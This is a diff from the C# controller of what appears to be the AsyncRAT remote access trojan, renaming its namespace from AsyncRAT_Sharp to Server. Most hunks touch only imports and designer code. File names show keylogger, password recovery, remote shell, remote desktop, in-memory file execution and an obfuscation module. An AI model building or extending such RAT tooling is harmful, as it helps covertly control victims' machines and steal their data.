@ -12,7 +12,7 @@ using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormKeylogger : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormPassword
{

View File

@ -8,7 +8,7 @@ using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormPassword : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormPorts
{

View File

@ -2,10 +2,10 @@
using System.Windows.Forms;
using System.IO;
using System.Diagnostics;
using AsyncRAT_Sharp.Helper;
using Server.Helper;
using System.Security.Cryptography.X509Certificates;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormPorts : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormProcessManager
{

View File

@ -8,10 +8,10 @@ using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormProcessManager : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormRemoteDesktop
{
@ -84,7 +84,7 @@
//
// btnMouse
//
this.btnMouse.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.mouse;
this.btnMouse.BackgroundImage = global::Server.Properties.Resources.mouse;
this.btnMouse.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
this.btnMouse.Location = new System.Drawing.Point(550, 3);
this.btnMouse.Name = "btnMouse";
@ -95,7 +95,7 @@
//
// btnSave
//
this.btnSave.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.save_image;
this.btnSave.BackgroundImage = global::Server.Properties.Resources.save_image;
this.btnSave.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
this.btnSave.Location = new System.Drawing.Point(455, 3);
this.btnSave.Name = "btnSave";
@ -171,7 +171,7 @@
//
// button1
//
this.button1.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.stop__1_;
this.button1.BackgroundImage = global::Server.Properties.Resources.stop__1_;
this.button1.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
this.button1.Location = new System.Drawing.Point(12, 3);
this.button1.Name = "button1";
@ -182,7 +182,7 @@
//
// button2
//
this.button2.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.arrow_up;
this.button2.BackgroundImage = global::Server.Properties.Resources.arrow_up;
this.button2.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
this.button2.FlatStyle = System.Windows.Forms.FlatStyle.Flat;
this.button2.Location = new System.Drawing.Point(428, 44);

View File

@ -10,14 +10,14 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using AsyncRAT_Sharp.Sockets;
using AsyncRAT_Sharp.MessagePack;
using Server.Sockets;
using Server.MessagePack;
using System.Threading;
using System.Drawing.Imaging;
using System.IO;
using Encoder = System.Drawing.Imaging.Encoder;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormRemoteDesktop : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp
namespace Server
{
partial class FormSendFileToMemory
{

View File

@ -9,9 +9,9 @@ using System.Threading.Tasks;
using System.Windows.Forms;
using System.IO;
using System.Reflection;
using AsyncRAT_Sharp.Helper;
using Server.Helper;
namespace AsyncRAT_Sharp
namespace Server
{
public partial class FormSendFileToMemory : Form
{

View File

@ -1,107 +1,107 @@
namespace AsyncRAT_Sharp.Forms
{
partial class FormShell
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;
/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}
#region Windows Form Designer generated code
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
this.components = new System.ComponentModel.Container();
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell));
this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.textBox1 = new System.Windows.Forms.TextBox();
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.panel1 = new System.Windows.Forms.Panel();
this.SuspendLayout();
//
// richTextBox1
//
this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
| System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.richTextBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.richTextBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(248)))), ((int)(((byte)(248)))), ((int)(((byte)(242)))));
this.richTextBox1.Location = new System.Drawing.Point(0, 0);
this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.ReadOnly = true;
this.richTextBox1.Size = new System.Drawing.Size(800, 412);
this.richTextBox1.TabIndex = 0;
this.richTextBox1.Text = "";
//
// textBox1
//
this.textBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(248)))), ((int)(((byte)(248)))), ((int)(((byte)(242)))));
this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom;
this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.textBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.textBox1.Location = new System.Drawing.Point(46, 423);
this.textBox1.Name = "textBox1";
this.textBox1.Size = new System.Drawing.Size(754, 26);
this.textBox1.TabIndex = 1;
this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown);
//
// timer1
//
this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
// panel1
//
this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.panel1.Dock = System.Windows.Forms.DockStyle.Left;
this.panel1.Location = new System.Drawing.Point(0, 0);
this.panel1.Margin = new System.Windows.Forms.Padding(4, 5, 4, 5);
this.panel1.Name = "panel1";
this.panel1.Size = new System.Drawing.Size(46, 449);
this.panel1.TabIndex = 2;
//
// FormShell
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.ClientSize = new System.Drawing.Size(800, 449);
this.Controls.Add(this.richTextBox1);
this.Controls.Add(this.textBox1);
this.Controls.Add(this.panel1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormShell";
this.Text = "Remote Shell";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed);
this.ResumeLayout(false);
this.PerformLayout();
}
#endregion
private System.Windows.Forms.TextBox textBox1;
public System.Windows.Forms.RichTextBox richTextBox1;
private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Panel panel1;
}
namespace Server.Forms
{
partial class FormShell
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;
/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}
#region Windows Form Designer generated code
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
this.components = new System.ComponentModel.Container();
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell));
this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.textBox1 = new System.Windows.Forms.TextBox();
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.panel1 = new System.Windows.Forms.Panel();
this.SuspendLayout();
//
// richTextBox1
//
this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
| System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.richTextBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.richTextBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(248)))), ((int)(((byte)(248)))), ((int)(((byte)(242)))));
this.richTextBox1.Location = new System.Drawing.Point(0, 0);
this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.ReadOnly = true;
this.richTextBox1.Size = new System.Drawing.Size(800, 412);
this.richTextBox1.TabIndex = 0;
this.richTextBox1.Text = "";
//
// textBox1
//
this.textBox1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(248)))), ((int)(((byte)(248)))), ((int)(((byte)(242)))));
this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom;
this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.textBox1.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.textBox1.Location = new System.Drawing.Point(46, 423);
this.textBox1.Name = "textBox1";
this.textBox1.Size = new System.Drawing.Size(754, 26);
this.textBox1.TabIndex = 1;
this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown);
//
// timer1
//
this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
// panel1
//
this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.panel1.Dock = System.Windows.Forms.DockStyle.Left;
this.panel1.Location = new System.Drawing.Point(0, 0);
this.panel1.Margin = new System.Windows.Forms.Padding(4, 5, 4, 5);
this.panel1.Name = "panel1";
this.panel1.Size = new System.Drawing.Size(46, 449);
this.panel1.TabIndex = 2;
//
// FormShell
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(40)))), ((int)(((byte)(42)))), ((int)(((byte)(54)))));
this.ClientSize = new System.Drawing.Size(800, 449);
this.Controls.Add(this.richTextBox1);
this.Controls.Add(this.textBox1);
this.Controls.Add(this.panel1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormShell";
this.Text = "Remote Shell";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed);
this.ResumeLayout(false);
this.PerformLayout();
}
#endregion
private System.Windows.Forms.TextBox textBox1;
public System.Windows.Forms.RichTextBox richTextBox1;
private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Panel panel1;
}
}

View File

@ -1,10 +1,10 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Diagnostics;
using System.Drawing;
using System.Linq;
using System.Text;
@ -12,7 +12,7 @@ using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormShell : Form
{
@ -57,11 +57,11 @@ namespace AsyncRAT_Sharp.Forms
private void Timer1_Tick(object sender, EventArgs e)
{
if (!C.ClientSocket.Connected) this.Close();
}
private void Label1_Click(object sender, EventArgs e)
{
Process.Start("https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands");
}
}
private void Label1_Click(object sender, EventArgs e)
{
Process.Start("https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands");
}
}
}

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormTorrent
{

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.ComponentModel;
@ -12,7 +12,7 @@ using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormTorrent : Form
{

View File

@ -1,6 +1,6 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.Forms;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.Linq;
@ -9,7 +9,7 @@ using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleChat
{

View File

@ -1,16 +1,16 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.Forms;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using System.Threading;
using System.Threading.Tasks;
using AsyncRAT_Sharp.Helper;
using Server.Helper;
using System.Diagnostics;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleFileManager
{

View File

@ -1,13 +1,13 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.Forms;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
class HandleKeylogger
{

View File

@ -1,12 +1,12 @@
using System;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using cGeoIp;
using System.Drawing;
using System.Windows.Forms;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleListView
{

View File

@ -6,7 +6,7 @@ using System.Threading.Tasks;
using System.Windows.Forms;
using System.Drawing;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleLogs
{

View File

@ -1,9 +1,9 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System.Diagnostics;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandlePing
{

View File

@ -1,12 +1,12 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.Forms;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleProcessManager
{

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.Drawing;
@ -9,7 +9,7 @@ using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleRecovery
{

View File

@ -1,14 +1,14 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.Helper;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.Forms;
using Server.Helper;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleRemoteDesktop
{

View File

@ -1,4 +1,4 @@
using AsyncRAT_Sharp.Sockets;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.Drawing;
@ -7,7 +7,7 @@ using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleReportWindow
{

View File

@ -1,6 +1,6 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.Forms;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.Linq;
@ -8,7 +8,7 @@ using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleShell
{

View File

@ -1,11 +1,11 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public class HandleThumbnails
{

View File

@ -1,14 +1,14 @@
using AsyncRAT_Sharp.Sockets;
using AsyncRAT_Sharp.MessagePack;
using Server.Sockets;
using Server.MessagePack;
using System;
using System.Diagnostics;
using System.Drawing;
using AsyncRAT_Sharp.Forms;
using Server.Forms;
using System.Security.Cryptography;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
namespace Server.Handle_Packet
{
public static class Packet
{

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.Linq;
@ -9,7 +9,7 @@ using System.Windows.Forms;
using System.Threading;
using System.Diagnostics;
namespace AsyncRAT_Sharp.Helper
namespace Server.Helper
{
public class AsyncTask
{

View File

@ -15,7 +15,7 @@ using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Helper
namespace Server.Helper
{
public static class CreateCertificate
{

View File

@ -3,7 +3,7 @@ using System.Runtime.InteropServices;
using System.Security;
namespace AsyncRAT_Sharp.Helper
namespace Server.Helper
{
public static class IconInjector
{

View File

@ -1,7 +1,7 @@
using System.Collections;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Helper
namespace Server.Helper
{
//support.microsoft.com/en-us/help/319401/how-to-sort-a-listview-control-by-a-column-in-visual-c
public class ListViewColumnSorter : IComparer

View File

@ -6,7 +6,7 @@ using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Helper
namespace Server.Helper
{
public static class ListviewDoubleBuffer
{

View File

@ -4,7 +4,7 @@ using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Helper
namespace Server.Helper
{
public static class Methods
{

View File

@ -6,7 +6,7 @@ using System.Reflection;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Helper
namespace Server.Helper
{
public class ReferenceLoader : MarshalByRefObject
{

View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Server.MessagePack
{
public class BytesTools
{

View File

@ -19,7 +19,7 @@ using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Server.MessagePack
{
public class MsgPackEnum : IEnumerator
{

View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Server.MessagePack
{
public enum MsgPackType
{

View File

@ -5,7 +5,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Server.MessagePack
{
class ReadTools
{

View File

@ -5,7 +5,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack
namespace Server.MessagePack
{
class WriteTools
{

View File

@ -12,7 +12,7 @@ using System.Windows.Forms;
This program Is distributed for educational purposes only.
*/
namespace AsyncRAT_Sharp
namespace Server
{
static class Program
{

View File

@ -8,7 +8,7 @@
// </auto-generated>
//------------------------------------------------------------------------------
namespace AsyncRAT_Sharp.Properties {
namespace Server.Properties {
using System;
@ -39,7 +39,7 @@ namespace AsyncRAT_Sharp.Properties {
internal static global::System.Resources.ResourceManager ResourceManager {
get {
if (object.ReferenceEquals(resourceMan, null)) {
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("AsyncRAT_Sharp.Properties.Resources", typeof(Resources).Assembly);
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Server.Properties.Resources", typeof(Resources).Assembly);
resourceMan = temp;
}
return resourceMan;

View File

@ -8,7 +8,7 @@
// </auto-generated>
//------------------------------------------------------------------------------
namespace AsyncRAT_Sharp.Properties {
namespace Server.Properties {
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]

View File

@ -1,11 +1,11 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using Server.RenamingObfuscation.Interfaces;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
public class Base64 : ICrypto
{

View File

@ -1,10 +1,10 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System.Collections.Generic;
using System.Linq;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
public class ClassesRenaming : IRenaming
{

View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
internal static class DecryptionHelper
{

View File

@ -1,10 +1,10 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System.Collections.Generic;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
public class FieldsRenaming : IRenaming
{

View File

@ -4,7 +4,7 @@ using System.Collections.Generic;
using System.Linq;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
public static class InjectHelper
{

View File

@ -1,8 +1,8 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
public class MethodsRenaming : IRenaming
{

View File

@ -1,4 +1,4 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
@ -7,7 +7,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
public class NamespacesRenaming : IRenaming
{

View File

@ -1,7 +1,7 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
public class PropertiesRenaming : IRenaming
{

View File

@ -3,7 +3,7 @@ using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
namespace Server.RenamingObfuscation.Classes
{
public static class Utils
{

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.RenamingObfuscation.Classes;
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using Server.RenamingObfuscation.Classes;
using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
using System;
@ -8,7 +8,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation
namespace Server.RenamingObfuscation
{
public static class EncryptString
{

View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Interfaces
namespace Server.RenamingObfuscation.Interfaces
{
public interface ICrypto
{

View File

@ -1,6 +1,6 @@
using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Interfaces
namespace Server.RenamingObfuscation.Interfaces
{
public interface IRenaming
{

View File

@ -1,10 +1,10 @@
using AsyncRAT_Sharp.RenamingObfuscation.Classes;
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
using Server.RenamingObfuscation.Classes;
using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet;
// Credit github.com/srn-g/RenamingObfuscation
// Fxied by nyan cat
namespace AsyncRAT_Sharp.RenamingObfuscation
namespace Server.RenamingObfuscation
{
public class Renaming
{

Some files were not shown because too many files have changed in this diff Show More